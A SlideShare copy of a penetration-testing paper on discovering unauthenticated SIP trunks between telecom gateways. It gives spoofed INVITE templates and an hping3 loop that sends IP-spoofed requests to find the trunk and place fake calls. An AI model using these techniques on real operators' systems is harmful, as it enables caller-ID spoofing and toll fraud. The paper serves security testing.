SlideShare ist ein Scribd-Unternehmen logo

Hacking Trust Relationships Between SIP Gateways

Fatih Ozavci
Fatih Ozavci
Technologie
1 von 7
Downloaden Sie, um offline zu lesen
Hacking Trust Relationships of SIP Gateways Author : Fatih Özavcı Homepage : gamasec.net/fozavci SIP Project Page : github.com/fozavci/gamasec-sipmodules Version : 0.9
Hacking Trust Relationships of SIP Proxies February 2013 Hacking Trust Relationship Between SIP Proxies NGN (Next Generation Networks) operators provide SIP services for their customers. Customers can call other operator's customers via SIP services and SIP gateways. SIP gateways use SIP Trunks for trusted call initiation and cdr/invoice management. SIP trunk defines as an IP address or specific FROM number in many cases. Challenge response or certificate based authentication is slow for quick response in this type of large call counts. Because of that, SIP trunks have no password or IP based filter applied for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Besides, most of SIP trunks have Direct INVITE privilege without REGISTER. Sample Network Diagram for Next Generation Networks GamaSEC Information Security Solutions Sayfa 2
Hacking Trust Relationships of SIP Proxies February 2013 In our example, Operator A SIP gateway (172.16.1.13) accepts calls from Operator B SIP (192.168.1.10) gateway. Also a privileged port number (5089) should be defined as a SIP Trunk. Operator A SIP gateway has a SIP Trunk for 192.168.1.10 IP address and 5089 UDP port. In this example, SIP Gateway accepts calls from 192.168.1.10 IP address and 5089 udp port without authentication. SIP Trunk Configuration of Operator A Gateway ACCEPT ALL from 192.168.1.10:5089 WITHOUT_AUTH As a penetration tester, we have no information about this configuration. Our only information is the IP address of Operator A SIP gateway, 172.16.1.13. We cannot detect trusted Operator Networks without any extra information. We can search newspapers or Internet for any trusted Telecom Company connections. It could be enumerated if we have a trusted 3rd party Operator IP Network information. So, here is our start point, we have the IP address of Operator A SIP gateway (172.16.1.13) and 3rd party trusted Operator's IP Network, 192.168.1.0/24. How could we detect SIP Trunk IP address and port of Operator B? The answer is INVITE spoofing with IP spoofing. First of all, we can send IP spoofed UDP packets (from 192.168.1.0/24) but we cannot get any answer for that. INVITE spoofing is required at this point, we can get a call INVITE spoofing with IP spoofing if Operator A SIP Gateway cannot detect INVITE spoofing. We can send SIP Calls from Operator B Network using IP spoofing. These calls should be defined for calling a well-known Client or Customer from Operator A. We can create this template INVITE request using valid INVITE request sample from Operator A. Then we should change IP address and Port of Attacker, also FROM field of INVITE. The reason of changing FROM field of INVITE request is getting valid IP address and Port of SIP Trunk using CLIP/CLIR screen of Customer's Phone. GamaSEC Information Security Solutions Sayfa 3
Hacking Trust Relationships of SIP Proxies February 2013 Our Basic Test Steps 1 Get an Account or Customer's Phone 2 Obtain a Valid INVITE Request 3 Test the Target SIP Gateway for INVITE Spoofing with a Known Account 4 Send IP Spoofed INVITE Requests 4.1 Create INVITE Spoofing Template 4.2 IP Addresses For Loop 4.3 Port Numbers For Loop 4.4 Changing INVITE Variables for Spoofed IP Address and Port 4.5 Setting FROM Field as IP:Port Obtaining Valid INVITE Request We should initiate a call with a valid account and we should capture INVITE request from a valid call handshake using Wireshark. Also we can initiate a call using Metasploit SIP Pen-Testing Kit for this part of test (see training videos). Sample INVITE Request INVITE sip:100@172.16.1.13 SIP/2.0 Via: SIP/2.0/UDP 111.222.33.44:5060; branch=2342sdf34324asdfasdf To: <sip:100@172.16.1.13;user=phone> From: <sip:101@172.16.1.13>;tag=50bf38ef322423571042 Call-ID: 32234wdf23432f@111.222.33.44:5060 CSeq: 1 INVITE Contact: <sip:101@111.222.33.44:5060;transport=udp> Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, INFO, REFER, NOTIFY Max-Forwards: 20 Supported: 100rel User-Agent: Softswitch 1.0.0 Content-Type: multipart/mixed;boundary= xxxx-xxxx-xxx Content-Length: 234 --xxxx-xxxx-xxx- Content-Type: application/SDP v=0 o=XXXXX 2 4640 IN IP4 172.16.1.13 s=phone-call c=IN IP4 111.222.33.44 t=0 0 m=audio 10338 RTP/AVP 8 0 18 4 GamaSEC Information Security Solutions Sayfa 4
Hacking Trust Relationships of SIP Proxies February 2013 a=ptime:20 --xxxx-xxxx-xxx- Content-Type: application/ISUP; base=nxv3; version=itu-t92+ Content-Disposition: signal; handling=optional …................ --xxxx-xxxx-xxx- INVITE Spoofing Test We should change FROM Field of INVITE to Fake Number and initiate the call. We could detect INVITE Spoofing is permitted if we see our Fake Number on Client's CLIP/CLIR screen. From: <sip:FAKENUMBER@172.16.1.13>;tag=50bf38ef322423571042 Metasploit SIP Pen-Testing kit has a support for basic INVITE spoofing and It will support advanced INVITE spoofing techniques soon. (see the training videos of SIP Pen-Test Kit) Additional Information for INVITE Spoofing INVITE spoofing is a very complex attack because of many fields are responsible for caller identity. FROM field is the first field and it could be changed for INVITE spoofing. Another forgotten feature of FROM is name feature, we could define name like <name>100@server. This should work for this attack, because we need just a field to put IP address and Port information. There are many headers for INVITE spoofing, these headers and content fields are listed below. • Via Field • P-Asserted-Identity • P-Called-Party-ID • P-Preferred-Identity • ISDN Calling Party Number • Remote-Party-ID GamaSEC Information Security Solutions Sayfa 5
Hacking Trust Relationships of SIP Proxies February 2013 Preparing Spoofed INVITE Request Template Here is the tricky part of this paper: We should prepare unique INVITE request for each IP address and Port combination. Important fields of INVITE request are highlighted. All fields prepared for template of our test sources, IPADDRESS label and PORT label used for that. Spoofed INVITE Request INVITE sip:100@172.16.1.13 SIP/2.0 Via: SIP/2.0/UDP IPADDRESS:PORT; branch=2342sdf34324asdfasdf To: <sip:100@172.16.1.13;user=phone> From: <sip:IPADDRESS:PORT@172.16.1.13>;tag=50bf38ef322423571042 Call-ID: 32234wdf23432f@IPADDRESS:PORT CSeq: 1 INVITE Contact: <sip:101@IPADDRESS:PORT;transport=udp> Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, INFO, REFER, NOTIFY Max-Forwards: 20 Supported: 100rel User-Agent: Softswitch 1.0.0 Content-Type: multipart/mixed;boundary= xxxx-xxxx-xxx Content-Length: 234 --xxxx-xxxx-xxx- Content-Type: application/SDP v=0 o=XXXXX 2 4640 IN IP4 172.16.1.13 s=phone-call c=IN IP4 IPADDRESS t=0 0 m=audio 10338 RTP/AVP 8 0 18 4 a=ptime:20 --xxxx-xxxx-xxx- Content-Type: application/ISUP; base=nxv3; version=itu-t92+ Content-Disposition: signal; handling=optional …................ --xxxx-xxxx-xxx- We need a few headers if target SIP Trunks need SIP Proxy headers. You should check these headers in regular INVITE requests of Operator A SIP Gateway. Also we should change these headers if the server needs these headers. P-Asserted-Identity field is another FROM field and target SIP gateway could use P-Asserted-Identity field rather than FROM field. We should set them correctly for each request. GamaSEC Information Security Solutions Sayfa 6
Hacking Trust Relationships of SIP Proxies February 2013 P-Asserted-Identity: <sip:IPADDRESS:PORT@172.16.1.13> P-Charging-Vector: icid-value=TESTPLATFORM;msan-id=MSANID;msan-pro=MSANPORT Record-Route: <sip:IPADDRESS:PORT;lr> Sending Spoofed INVITE Request Template from Operator B Network Now we can send our spoofed INVITE requests for Operator B Network. It should be performed with a loop for each IP address and Port combination. We can use hping for IP spoofing and sed for search&replace actions. This is a sample loop for IP spoofing for port in {5060..5090} do for host in {1..254} do cat invite_template | sed -e s/IPADDRESS/192.168.1.$host/ -e s/PORT/$port/ > stmplt hping3 -2 -d 1148 -E stpmlt -a 192.168.1.$host -s $port -p 5060 172.16.1.13 done done We should start this script and wait a call. We should have the SIP Trunk IP address and Port number if we have call with a spoofed Caller ID. If we have not a call, we should check our INVITE template for missing headers. At last, we have a SIP Trunk IP address and port number. We can use this SIP Trunk to call every privileged target number and initiate fake calls. When we need to initiate a fake call, we should send it with IP spoofed packet like a SIP trunk. I will add Custom Header support to my SIP Pen-Testing Kit, it's required for many test cases including this attack. Also I will develop a module to test this type of trust relationship with many options. GamaSEC Information Security Solutions Sayfa 7

Empfohlen

VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
 
Hardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceHardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceFatih Ozavci
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Fatih Ozavci
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesFatih Ozavci
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP Fatih Ozavci
 
VoIP – vulnerabilities and attacks
VoIP – vulnerabilities and attacksVoIP – vulnerabilities and attacks
VoIP – vulnerabilities and attacksn|u - The Open Security Community
 
Departed Communications: Learn the ways to smash them!
Departed Communications: Learn the ways to smash them!Departed Communications: Learn the ways to smash them!
Departed Communications: Learn the ways to smash them!Fatih Ozavci
 

Empfohlen

VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
 
Hardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceHardware Hacking Chronicles: IoT Hacking for Offence and Defence
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceFatih Ozavci
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Fatih Ozavci
 
VoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesVoIP Wars: Attack of the Cisco Phones
VoIP Wars: Attack of the Cisco PhonesFatih Ozavci
 
The Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopThe Art of VoIP Hacking - Defcon 23 Workshop
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
 
VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP VoIP Wars : Return of the SIP
VoIP Wars : Return of the SIP Fatih Ozavci
 
VoIP – vulnerabilities and attacks
VoIP – vulnerabilities and attacksVoIP – vulnerabilities and attacks
VoIP – vulnerabilities and attacksn|u - The Open Security Community
 
Departed Communications: Learn the ways to smash them!
Departed Communications: Learn the ways to smash them!Departed Communications: Learn the ways to smash them!
Departed Communications: Learn the ways to smash them!Fatih Ozavci
 
VoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenVoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenFatih Ozavci
 
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
VoIP Wars: Destroying Jar Jar Lync (Filtered version)VoIP Wars: Destroying Jar Jar Lync (Filtered version)
VoIP Wars: Destroying Jar Jar Lync (Filtered version)Fatih Ozavci
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.Sumutiu Marius
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problemsseanhn
 
Introduction to VoIP Security
Introduction to VoIP SecurityIntroduction to VoIP Security
Introduction to VoIP Securityn|u - The Open Security Community
 
Hacking and Attacking VoIP Systems - What You Need To Know
Hacking and Attacking VoIP Systems - What You Need To KnowHacking and Attacking VoIP Systems - What You Need To Know
Hacking and Attacking VoIP Systems - What You Need To KnowDan York
 
Voip security
Voip securityVoip security
Voip securityShethwala Ridhvesh
 
MBFuzzer : MITM Fuzzing for Mobile Applications
MBFuzzer : MITM Fuzzing for Mobile ApplicationsMBFuzzer : MITM Fuzzing for Mobile Applications
MBFuzzer : MITM Fuzzing for Mobile ApplicationsFatih Ozavci
 
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00tDefcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00tpseudor00t overflow
 
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open SourceI N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open SourceSuhas Desai
 
PrivateGSM - Voice Encryption Technical Overview
PrivateGSM - Voice Encryption Technical OverviewPrivateGSM - Voice Encryption Technical Overview
PrivateGSM - Voice Encryption Technical OverviewPrivateWave Italia SpA
 
#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLSOlle E Johansson
 
Encrypted Voice Communications
Encrypted Voice CommunicationsEncrypted Voice Communications
Encrypted Voice Communicationssbwahid
 
SlingSecure Mobile Voice Encryption
SlingSecure Mobile Voice EncryptionSlingSecure Mobile Voice Encryption
SlingSecure Mobile Voice EncryptionSlingSecure Mobile Encryption
 
Will STIR/SHAKEN Solve the Illegal Robocall Problem?
Will STIR/SHAKEN Solve the Illegal Robocall Problem?Will STIR/SHAKEN Solve the Illegal Robocall Problem?
Will STIR/SHAKEN Solve the Illegal Robocall Problem?Alan Percy
 
DEFCON 23 - Fatih Ozavci - the art of voip workshop
DEFCON 23 - Fatih Ozavci - the art of voip workshopDEFCON 23 - Fatih Ozavci - the art of voip workshop
DEFCON 23 - Fatih Ozavci - the art of voip workshopFelipe Prado
 
Voice encryption for gsm using arduino
Voice encryption for gsm using arduinoVoice encryption for gsm using arduino
Voice encryption for gsm using arduinoiruldaworld
 
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM SystemLabmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM SystemSyuan Wang
 
Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Novosco
 
Fortinet security fabric
Fortinet security fabricFortinet security fabric
Fortinet security fabricANSItunCERT
 
VoIP - Cisco CME &amp; IP Communicator
VoIP - Cisco CME &amp; IP CommunicatorVoIP - Cisco CME &amp; IP Communicator
VoIP - Cisco CME &amp; IP Communicatorchinmaypadhye1985
 
Introduction To SIP
Introduction To SIPIntroduction To SIP
Introduction To SIPChris McAndrew
 

Weitere ähnliche Inhalte

Was ist angesagt?

VoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenVoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenFatih Ozavci
 
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
VoIP Wars: Destroying Jar Jar Lync (Filtered version)VoIP Wars: Destroying Jar Jar Lync (Filtered version)
VoIP Wars: Destroying Jar Jar Lync (Filtered version)Fatih Ozavci
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.Sumutiu Marius
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problemsseanhn
 
Hacking and Attacking VoIP Systems - What You Need To Know
Hacking and Attacking VoIP Systems - What You Need To KnowHacking and Attacking VoIP Systems - What You Need To Know
Hacking and Attacking VoIP Systems - What You Need To KnowDan York
 
MBFuzzer : MITM Fuzzing for Mobile Applications
MBFuzzer : MITM Fuzzing for Mobile ApplicationsMBFuzzer : MITM Fuzzing for Mobile Applications
MBFuzzer : MITM Fuzzing for Mobile ApplicationsFatih Ozavci
 
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00tDefcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00tpseudor00t overflow
 
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open SourceI N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open SourceSuhas Desai
 
PrivateGSM - Voice Encryption Technical Overview
PrivateGSM - Voice Encryption Technical OverviewPrivateGSM - Voice Encryption Technical Overview
PrivateGSM - Voice Encryption Technical OverviewPrivateWave Italia SpA
 
#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLSOlle E Johansson
 
Encrypted Voice Communications
Encrypted Voice CommunicationsEncrypted Voice Communications
Encrypted Voice Communicationssbwahid
 
Will STIR/SHAKEN Solve the Illegal Robocall Problem?
Will STIR/SHAKEN Solve the Illegal Robocall Problem?Will STIR/SHAKEN Solve the Illegal Robocall Problem?
Will STIR/SHAKEN Solve the Illegal Robocall Problem?Alan Percy
 
DEFCON 23 - Fatih Ozavci - the art of voip workshop
DEFCON 23 - Fatih Ozavci - the art of voip workshopDEFCON 23 - Fatih Ozavci - the art of voip workshop
DEFCON 23 - Fatih Ozavci - the art of voip workshopFelipe Prado
 
Voice encryption for gsm using arduino
Voice encryption for gsm using arduinoVoice encryption for gsm using arduino
Voice encryption for gsm using arduinoiruldaworld
 
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM SystemLabmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM SystemSyuan Wang
 
Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Novosco
 
Fortinet security fabric
Fortinet security fabricFortinet security fabric
Fortinet security fabricANSItunCERT
 

Was ist angesagt? (20)

VoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers AwakenVoIP Wars: The Phreakers Awaken
VoIP Wars: The Phreakers Awaken
 
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
VoIP Wars: Destroying Jar Jar Lync (Filtered version)VoIP Wars: Destroying Jar Jar Lync (Filtered version)
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problems
 
Introduction to VoIP Security
Introduction to VoIP SecurityIntroduction to VoIP Security
Introduction to VoIP Security
 
Hacking and Attacking VoIP Systems - What You Need To Know
Hacking and Attacking VoIP Systems - What You Need To KnowHacking and Attacking VoIP Systems - What You Need To Know
Hacking and Attacking VoIP Systems - What You Need To Know
 
Voip security
Voip securityVoip security
Voip security
 
MBFuzzer : MITM Fuzzing for Mobile Applications
MBFuzzer : MITM Fuzzing for Mobile ApplicationsMBFuzzer : MITM Fuzzing for Mobile Applications
MBFuzzer : MITM Fuzzing for Mobile Applications
 
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00tDefcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
Defcon 21-ozavci-vo ip-wars-return-of-the-sip by pseudor00t
 
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open SourceI N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
I N T E R O P09 Suhas Desai Secure Your Vo I P Network With Open Source
 
PrivateGSM - Voice Encryption Technical Overview
PrivateGSM - Voice Encryption Technical OverviewPrivateGSM - Voice Encryption Technical Overview
PrivateGSM - Voice Encryption Technical Overview
 
#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS#MoreCrypto : Introduction to TLS
#MoreCrypto : Introduction to TLS
 
Encrypted Voice Communications
Encrypted Voice CommunicationsEncrypted Voice Communications
Encrypted Voice Communications
 
SlingSecure Mobile Voice Encryption
SlingSecure Mobile Voice EncryptionSlingSecure Mobile Voice Encryption
SlingSecure Mobile Voice Encryption
 
Will STIR/SHAKEN Solve the Illegal Robocall Problem?
Will STIR/SHAKEN Solve the Illegal Robocall Problem?Will STIR/SHAKEN Solve the Illegal Robocall Problem?
Will STIR/SHAKEN Solve the Illegal Robocall Problem?
 
DEFCON 23 - Fatih Ozavci - the art of voip workshop
DEFCON 23 - Fatih Ozavci - the art of voip workshopDEFCON 23 - Fatih Ozavci - the art of voip workshop
DEFCON 23 - Fatih Ozavci - the art of voip workshop
 
Voice encryption for gsm using arduino
Voice encryption for gsm using arduinoVoice encryption for gsm using arduino
Voice encryption for gsm using arduino
 
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM SystemLabmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
Labmeeting - 20150211 - Novel End-to-End Voice Encryption Method in GSM System
 
Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017Network Security - Fortinet, Dublin June 2017
Network Security - Fortinet, Dublin June 2017
 
Fortinet security fabric
Fortinet security fabricFortinet security fabric
Fortinet security fabric
 

Ähnlich wie Hacking Trust Relationships Between SIP Gateways

VoIP - Cisco CME &amp; IP Communicator
VoIP - Cisco CME &amp; IP CommunicatorVoIP - Cisco CME &amp; IP Communicator
VoIP - Cisco CME &amp; IP Communicatorchinmaypadhye1985
 
1 Vo Ip Overview
1 Vo Ip Overview1 Vo Ip Overview
1 Vo Ip OverviewMayank Vora
 
1 Vo I P Overview
1 Vo I P Overview1 Vo I P Overview
1 Vo I P OverviewMayank Vora
 
1 VoIP Overview[1]
1 VoIP Overview[1]1 VoIP Overview[1]
1 VoIP Overview[1]William Giba
 
SIP: Call Id, Cseq, Via-branch, From & To-tag role play
SIP: Call Id, Cseq, Via-branch, From & To-tag role playSIP: Call Id, Cseq, Via-branch, From & To-tag role play
SIP: Call Id, Cseq, Via-branch, From & To-tag role playSridhar Kumar N
 
اسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونی
اسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونیاسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونی
اسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونیMohammad Reza Kamalifard
 
Matrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP Phones
Matrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP PhonesMatrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP Phones
Matrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP PhonesMatrix Comsec
 
VoIP on LTE -packet Filter
VoIP on LTE -packet FilterVoIP on LTE -packet Filter
VoIP on LTE -packet Filterraj_naveen
 
Authenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call ControlAuthenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call ControlWarren Bent
 
Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2Warren Bent
 
SIP in action Itexpo West
SIP in action Itexpo WestSIP in action Itexpo West
SIP in action Itexpo WestGraham Francis
 
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAlessandro Polidori
 
D04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdf
D04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdfD04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdf
D04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdfElyDaliman
 
End to End volte ims sip call flow Guide - Mobile originating and Mobile term...
End to End volte ims sip call flow Guide - Mobile originating and Mobile term...End to End volte ims sip call flow Guide - Mobile originating and Mobile term...
End to End volte ims sip call flow Guide - Mobile originating and Mobile term...Vikas Shokeen
 
GVP8- Troubleshooting.pptx
GVP8- Troubleshooting.pptxGVP8- Troubleshooting.pptx
GVP8- Troubleshooting.pptxMiyuruChamath
 

Ähnlich wie Hacking Trust Relationships Between SIP Gateways (20)

VoIP - Cisco CME &amp; IP Communicator
VoIP - Cisco CME &amp; IP CommunicatorVoIP - Cisco CME &amp; IP Communicator
VoIP - Cisco CME &amp; IP Communicator
 
Introduction To SIP
Introduction To SIPIntroduction To SIP
Introduction To SIP
 
1 Vo Ip Overview
1 Vo Ip Overview1 Vo Ip Overview
1 Vo Ip Overview
 
1 Vo I P Overview
1 Vo I P Overview1 Vo I P Overview
1 Vo I P Overview
 
Sip crash course
Sip crash courseSip crash course
Sip crash course
 
1 VoIP Overview[1]
1 VoIP Overview[1]1 VoIP Overview[1]
1 VoIP Overview[1]
 
1 Vo Ip Overview
1 Vo Ip Overview1 Vo Ip Overview
1 Vo Ip Overview
 
IP and VoIP Fundamentals
IP and VoIP FundamentalsIP and VoIP Fundamentals
IP and VoIP Fundamentals
 
SIP: Call Id, Cseq, Via-branch, From & To-tag role play
SIP: Call Id, Cseq, Via-branch, From & To-tag role playSIP: Call Id, Cseq, Via-branch, From & To-tag role play
SIP: Call Id, Cseq, Via-branch, From & To-tag role play
 
Eternity NE VoIP
Eternity NE VoIPEternity NE VoIP
Eternity NE VoIP
 
اسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونی
اسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونیاسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونی
اسلاید اول جلسه یازدهم کلاس پایتون برای هکرهای قانونی
 
Matrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP Phones
Matrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP PhonesMatrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP Phones
Matrix Telecom Solutions: SPARSH VP248 - Feature-rich SIP Phones
 
VoIP on LTE -packet Filter
VoIP on LTE -packet FilterVoIP on LTE -packet Filter
VoIP on LTE -packet Filter
 
Authenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call ControlAuthenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call Control
 
Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2
 
SIP in action Itexpo West
SIP in action Itexpo WestSIP in action Itexpo West
SIP in action Itexpo West
 
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus GatewayAsterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
Asterisk WebRTC frontier: make client SIP Phone with sipML5 and Janus Gateway
 
D04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdf
D04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdfD04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdf
D04.VoLTE SIP Call Flow – Mobile Originating (MO) & Terminating (MT).pdf
 
End to End volte ims sip call flow Guide - Mobile originating and Mobile term...
End to End volte ims sip call flow Guide - Mobile originating and Mobile term...End to End volte ims sip call flow Guide - Mobile originating and Mobile term...
End to End volte ims sip call flow Guide - Mobile originating and Mobile term...
 
GVP8- Troubleshooting.pptx
GVP8- Troubleshooting.pptxGVP8- Troubleshooting.pptx
GVP8- Troubleshooting.pptx
 

Mehr von Fatih Ozavci

Viproy ile VoIP Güvenlik Denetimi
Viproy ile VoIP Güvenlik DenetimiViproy ile VoIP Güvenlik Denetimi
Viproy ile VoIP Güvenlik DenetimiFatih Ozavci
 
Mahremiyetinizi Koruyun
Mahremiyetinizi KoruyunMahremiyetinizi Koruyun
Mahremiyetinizi KoruyunFatih Ozavci
 
NGN ve VoIP Ağları Güvenlik Denetimi
NGN ve VoIP Ağları Güvenlik DenetimiNGN ve VoIP Ağları Güvenlik Denetimi
NGN ve VoIP Ağları Güvenlik DenetimiFatih Ozavci
 
Metasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit GelistirmeMetasploit Framework ile Exploit Gelistirme
Metasploit Framework ile Exploit GelistirmeFatih Ozavci
 
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiMetasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiFatih Ozavci
 
Bilgi Guvenligi Temel Kavramlar
Bilgi Guvenligi Temel Kavramlar Bilgi Guvenligi Temel Kavramlar
Bilgi Guvenligi Temel Kavramlar Fatih Ozavci
 
Mahremiyet Ekseninde Ozgur Yazilimlar
